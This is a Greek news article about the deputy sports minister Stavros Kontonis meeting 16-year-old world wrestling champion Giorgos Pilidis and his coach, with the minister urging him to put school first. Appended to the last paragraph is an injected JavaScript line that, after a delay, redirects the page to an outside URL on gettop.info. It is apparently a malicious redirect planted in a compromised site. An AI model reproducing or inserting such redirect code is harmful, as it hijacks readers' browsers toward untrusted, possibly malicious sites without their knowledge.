Ο Σταύρος Κοντονής δέχθηκε το «χρυσό» παιδί της ελληνικής Πάλης

0
9

 

Τον παγκόσμιο πρωταθλητή της πάλης, Γιώργο Πιλίδη και τον Ολυμπιονίκη, προπονητή του, Αμιράν Καρντάνοφ, υποδέχτηκε στο γραφείο του ο υφυπουργός Πολιτισμού και Αθλητισμού Σταύρος Κοντονής.

Ο υφυπουργός συνεχάρη το «χρυσό» παιδί της ελληνικής Πάλης, που τα τελευταία δύο χρόνια έχει κατακτήσει τέσσερα μετάλλια σε Παγκόσμια και Ευρωπαϊκά πρωταθλήματα.

Ο κ.Κοντονής, άκουσε με προσοχή τον Πιλίδη και υποσχέθηκε πως η Πολιτεία θα σταθεί στο πλευρό του.

Ο υφυπουργός φάνηκε απόλυτα ενήμερος για τις επιτυχίες του νεαρού και τον συμβούλευσε να δώσει ιδιαίτερο βάρος στο σχολείο, καθώς ανεξάρτητα από το πόσο επιτυχημένος αθλητής είναι ή θα γίνει, το σχολείο είναι το πιο σημαντικό πράγμα στη ζωή ενός νέου ανθρώπου, όπως είπε χαρακτηριστικά.

Ο Γιώργος Πιλίδης, μαζί με τον προπονητή του Αμιράν Καρντάνοφ προσκάλεσαν τον Σταύρο Κοντονή στο Παγκόσμιο πρωτάθλημα Παίδων που θα γίνει του χρόνου στην Αθήνα, όπου ο 16χρονος αθλητής, ευελπιστεί να κάνει το «τρία στα τρία» και να ανέβει για τρίτη διαδοχική χρονιά στο βάθρο ενός Παγκοσμίου πρωταθλήματος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here